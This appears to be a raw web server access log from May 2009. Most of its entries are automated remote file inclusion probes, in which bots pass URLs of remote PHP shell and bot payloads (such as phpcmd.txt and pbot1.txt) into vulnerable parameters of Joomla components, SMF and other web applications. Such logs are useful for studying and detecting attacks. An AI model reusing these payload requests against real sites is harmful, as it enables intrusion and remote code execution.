80.237.146.58 - - [31/May/2009:01:13:03 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.100.220.126 - - [31/May/2009:01:13:05 -0400] "GET //main.php?appserv_root=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
210.100.220.126 - - [31/May/2009:01:14:21 -0400] "GET /logs/error_log.Q108070700//main.php?appserv_root=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
210.100.220.126 - - [31/May/2009:01:14:21 -0400] "GET /logs//main.php?appserv_root=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
209.59.12.99 - - [31/May/2009:01:15:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
115.145.170.177 - - [31/May/2009:01:15:32 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.145.170.177 - - [31/May/2009:01:15:33 -0400] "GET //?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.116.102.163 - - [31/May/2009:01:17:37 -0400] "GET /logs/error_log.Q109050800//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
210.116.102.163 - - [31/May/2009:01:17:38 -0400] "GET //playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
210.116.102.163 - - [31/May/2009:01:17:38 -0400] "GET /logs//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
115.145.170.177 - - [31/May/2009:01:17:55 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.145.170.177 - - [31/May/2009:01:17:56 -0400] "GET //?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.145.170.177 - - [31/May/2009:01:17:56 -0400] "GET /logs//?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 200 3567 "-" "libwww-perl/5.805"
83.103.72.130 - - [31/May/2009:01:18:22 -0400] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:18:22 -0400] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:18:23 -0400] "GET /logs/access_log.Q109021500/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:18:32 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.116.102.163 - - [31/May/2009:01:19:10 -0400] "GET /logs/error_log.Q109051800//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
209.59.12.99 - - [31/May/2009:01:20:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [31/May/2009:01:20:56 -0400] "GET /index.php?arquivo=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:01:21:04 -0400] "GET /logs/error_log.Q109050500//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:21:04 -0400] "GET /logs/error_log.Q109050500//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:21:04 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:21:05 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.246.20.221 - - [31/May/2009:01:21:05 -0400] "GET /logs/access_log.Q109052300%20%20/index.php?arquivo=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:01:21:05 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:21:05 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
218.246.20.221 - - [31/May/2009:01:21:41 -0400] "GET /logs/index.php?arquivo=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
115.145.170.177 - - [31/May/2009:01:22:28 -0400] "GET //?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
83.103.72.130 - - [31/May/2009:01:22:45 -0400] "GET /logs/access_log.Q109021500%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
115.145.170.177 - - [31/May/2009:01:22:47 -0400] "GET /logs/access_log.Q109052300//?_zb_path=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
12.184.171.65 - - [31/May/2009:01:22:47 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 284 "-" "libwww-perl/5.65"
12.184.171.65 - - [31/May/2009:01:22:48 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
12.184.171.65 - - [31/May/2009:01:22:48 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
83.103.72.130 - - [31/May/2009:01:23:11 -0400] "GET /logs/access_log.Q109052100%20%20/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:24:11 -0400] "GET /errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:24:11 -0400] "GET /logs/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:24:39 -0400] "GET ///vwar/backup/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:24:39 -0400] "GET /logs/access_log.Q109052100///vwar/backup/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:24:40 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:53 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:54 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:54 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:58 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:24:58 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:01:25:16 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur-x.do.am/id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
62.149.0.248 - - [31/May/2009:01:25:21 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:25:21 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:01:25:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.130 - - [31/May/2009:01:25:34 -0400] "GET /logs/access_log.Q109051800///vwar/backup/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:01:25:46 -0400] "GET /logs/access_log.Q108090400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [31/May/2009:01:26:12 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:23 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:24 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:26:24 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:01:26:41 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
74.6.8.108 - - [31/May/2009:01:27:57 -0400] "GET /images/_notes/ace_logo_top.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [31/May/2009:01:30:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
12.184.171.65 - - [31/May/2009:01:32:25 -0400] "GET /logs/error_log.Q108100300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.profes.com.my/kakiphoto/xpl??? HTTP/1.1" 404 283 "-" "libwww-perl/5.65"
193.239.4.3 - - [31/May/2009:01:32:48 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
218.38.16.54 - - [31/May/2009:01:33:19 -0400] "GET /logs/error_log.Q109050800//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 236 "-" "libwww-perl/5.826"
218.38.16.54 - - [31/May/2009:01:33:20 -0400] "GET //playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 210 "-" "libwww-perl/5.826"
218.38.16.54 - - [31/May/2009:01:33:21 -0400] "GET /logs//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 215 "-" "libwww-perl/5.826"
217.147.29.190 - - [31/May/2009:01:34:02 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:34:02 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:34:09 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:01:34:13 -0400] "GET /logs/access_log.Q109050300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:01:34:24 -0400] "GET /logs/error_log.Q108052600//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:01:34:24 -0400] "GET /logs/error_log.Q108052600//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:34:58 -0400] "GET /logs/error_log.Q108070800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 265 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.239.4.3 - - [31/May/2009:01:34:58 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 239 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.239.4.3 - - [31/May/2009:01:35:00 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:35:00 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:35:10 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:35:10 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:35:22 -0400] "GET /logs/access_log.Q109050300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 266 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.239.4.3 - - [31/May/2009:01:35:22 -0400] "GET /logs/error_log.Q108070800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:35:23 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:35:23 -0400] "GET /logs/access_log.Q109050300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:35:23 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:01:35:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.116.102.163 - - [31/May/2009:01:35:43 -0400] "GET /logs/error_log.Q108081400//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
210.116.102.163 - - [31/May/2009:01:35:44 -0400] "GET //playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
210.116.102.163 - - [31/May/2009:01:35:44 -0400] "GET /logs//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 215 "-" "libwww-perl/5.803"
62.149.0.248 - - [31/May/2009:01:35:47 -0400] "GET /logs/error_log.Q109050500//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:35:50 -0400] "GET /logs/access_log.Q109050300/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:35:50 -0400] "GET /logs/error_log.Q109050500//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:35:51 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:35:51 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:35:51 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:01:35:51 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
207.44.232.81 - - [31/May/2009:01:36:18 -0400] "GET /errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:36:18 -0400] "GET /logs/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:36:23 -0400] "GET //include/write.php?dir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:36:23 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:01:36:23 -0400] "GET /logs//include/write.php?dir=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.16.54 - - [31/May/2009:01:36:37 -0400] "GET /logs/error_log.Q109051800//playing.php?commonpath=http://www.bbenglish.net/zb41/di?? HTTP/1.1" 404 236 "-" "libwww-perl/5.826"
83.103.72.130 - - [31/May/2009:01:36:48 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:36:48 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:36:58 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:36:59 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:37:22 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:37:22 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:37:35 -0400] "GET /errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:37:35 -0400] "GET /logs/access_log.Q109052300%20%20/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:37:35 -0400] "GET /logs/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:37:41 -0400] "GET /errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:37:41 -0400] "GET /logs/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:37:41 -0400] "GET /logs/access_log.Q109052300%20%20/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:37:44 -0400] "GET /logs/access_log.Q109051100%20%20/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:01:37:47 -0400] "GET /logs/access_log.Q109051800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
217.147.29.190 - - [31/May/2009:01:37:57 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:37:59 -0400] "GET /logs/access_log.Q109051100%20%20/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:01:38:25 -0400] "GET /mainbody.php?option=com_custompages&cpage=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:01:38:25 -0400] "GET /logs/access_log.Q109052300/mainbody.php?option=com_custompages&cpage=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:01:38:25 -0400] "GET /logs/mainbody.php?option=com_custompages&cpage=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:38:43 -0400] "GET /logs/access_log.Q109050300%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/idrb1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.122.160.145 - - [31/May/2009:01:38:44 -0400] "GET /logs/access_log.Q109051100/mainbody.php?option=com_custompages&cpage=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:38:46 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:01:38:53 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:39:21 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.44.232.81 - - [31/May/2009:01:39:27 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:39:41 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:01:39:41 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:01:40:01 -0400] "GET //include/write.php?dir=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:01:40:01 -0400] "GET /logs//include/write.php?dir=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:01:40:02 -0400] "GET /logs/access_log.Q109051100//include/write.php?dir=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
193.239.4.3 - - [31/May/2009:01:40:03 -0400] "GET /logs/error_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:40:04 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
193.239.4.3 - - [31/May/2009:01:40:04 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://qigong-club.ru/bitrix/tools/v.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.59.12.99 - - [31/May/2009:01:40:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
